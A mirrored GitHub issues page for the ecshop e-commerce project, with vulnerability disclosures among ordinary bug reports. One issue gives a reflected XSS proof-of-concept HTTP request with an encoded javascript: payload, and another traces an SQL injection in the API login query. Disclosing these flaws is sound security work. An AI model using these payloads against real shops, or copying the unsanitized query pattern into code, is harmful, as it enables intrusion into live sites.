Giter Site home page Giter Site logo

ecshop's People

Contributors

flaboy avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

woerwin zhihuixing unix1986 x2x4com 18078861610 xinmy yushine blademainer boosheng zmingchun dldev0 kuying runphp yoka24443 gameagestudio chenyongze zjh1943 osub szogroup tianxingxia-cn rainmanzj daidong123654 zhang637 tempbottle som2y yuhongjie stevenxiaozhao adonis2014 oscarli 551618846 hujuly bigboyhomeless rscai ronaldbao idsyn frankxia2013 otnp shuiping150 funweb huangdehui2013 xcf007 zhuir zhendeguoke1008 lttlsnk dw250100785 mf1389004071 tianguanghui ljdcn guocdfeifei yangzilong1986 jiffychen topbean cnyzgkn starwork tonyzh-cn haoqitech uxiexs yangwen27 beclever yarec mariocisco smiler94 cuiguangkai szlfwolf yulin3 liangshiyuan zouxinxin kltt22 iitsoft kennywzhang hu19891110 xiongamo fish444556 zhangludi chenhbzl dazi005 balatintin jnan77 laijunming liuxiaoyue1203 liangcongqq guoyu07 situerte roselind handgod j2go yesde wang-p simple417 terryluwenbin tantantzp yuanzf startup-ml liupu027 95zz billoway smartfire xzeng1991 songdun zzwpower

ecshop's Issues

Ecshop 3.6 has a Reflected XSS vulnerability

Summary

Ecshop 3.6 is susceptible to a reflected XSS attack.
The flaw exists due to improper handling and concatenation of user-supplied input in the construction of HTML form elements, leading to potential execution of malicious scripts.

Details

In ecshop/article_cat.php, we can see that the code assigns the value of $_POST['cur_url'] to $search_url, but it is not filtered.
image
In ecshop/temp/compiled/article_cat.dwt.php, $search_url is directly concatenated into the code, which leads to a reflective XSS vulnerability.
image

Proof of Concept (POC)

POST /article_cat.php?id=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 192.168.160.158:1042
Connection: Keep-alive

cur_url=http://www.example.com">%3ca%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMe<!--&id=1&keywords=1

image

这里有BUG,有可能导致死循环

ecshop/upload/includes/lib_main.php

Line 273 in 725956b

function get_parent_cats($cat) 

$arr = $GLOBALS['db']->GetAll('SELECT cat_id, cat_name, parent_id, is_show FROM ' . $GLOBALS['yp']->table('category') . 'WHERE is_show=1');

get_parent_cats 这个函数以上读取可用分类的时候,是通过 is_show=1 来读取的,但是如果上层有分类设置为 is_show=0 的话,那么下层的一些商品的详情页在这里读取上层分类数据的时候就会跳不出这个 while(1) 造成死循环了。

临时解决方法参考(标注 // Eric @20210217 的行是添加的):

function get_parent_cats($cat)
{
    if ($cat == 0)
    {
        return array();
    }

    $arr = $GLOBALS['db']->GetAll('SELECT cat_id, cat_name, parent_id, is_show FROM ' . $GLOBALS['yp']->table('category') . 'WHERE is_show=1');

    if (empty($arr))
    {
        return array();
    }

    $index = 0;
    $cats  = array();
    $flag = false; // Eric @20210217

    while (1)
    {
        $flag = false; // Eric @20210217
        
        foreach ($arr AS $row)
        {
            if ($cat == $row['cat_id'])
            {
                $cat = $row['parent_id'];

                $flag = true; // Eric @20210217
                
                $cats[$index]['cat_id']   = $row['cat_id'];
                $cats[$index]['cat_name'] = $row['cat_name'];
                $cats[$index]['parent_id'] = $row['parent_id'];
                $cats[$index]['is_show'] = $row['is_show'];

                $index++;
                break;
            }
        }

        if ($index == 0 || $cat == 0)
        {
            break;
        }
        
        // Eric @20210217
        if (!$flag)
        {
            break;
        }
    }

    return $cats;
}

Possible SQL injection vulnerability

Hello,

I would like to report for SQLI vulnerability.

Vulnerability path

File shopex\ecshop\upload\api\client\api.php

dispatch($_POST);

File shopex\ecshop\upload\api\client\includes\lib_api.php

function dispatch($post)
    {
        
        $func_arr = array('GetDomain', 'UserLogin', 'AddCategory', 'AddBrand', 'AddGoods', 'GetCategory', 'GetBrand', 'GetGoods', 'DeleteBrand', 'DeleteCategory', 'DeleteGoods', 'EditBrand', 'EditCategory', 'EditGoods');
        if(in_array($post['Action'], $func_arr) && function_exists('API_'.$post['Action']))
        {
            call_user_func('API_'.$post['Action'], $post);

File shopex\ecshop\upload\api\client\includes\lib_api.php

function API_UserLogin($post)
    {
        $post['username'] = isset($post['UserId']) ? trim($post['UserId']) : '';
        $post['password'] = isset($post['Password']) ? strtolower(trim($post['Password'])) : '';

        
        $sql = "SELECT user_id, user_name, password, action_list, last_login".
        " FROM " . $GLOBALS['ecs']->table('admin_user') .
        " WHERE user_name = '" . $post['username']. "'";

        $row = $GLOBALS['db']->getRow($sql);

File shopex\ecshop\upload\includes\cls_mysql.php

function getRow($sql, $limited = false)
    {
        $res = $this->query($sql);

How to create a sitemap?

I need to create a sitemap, but there seems to be no automatic creation function on the website.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.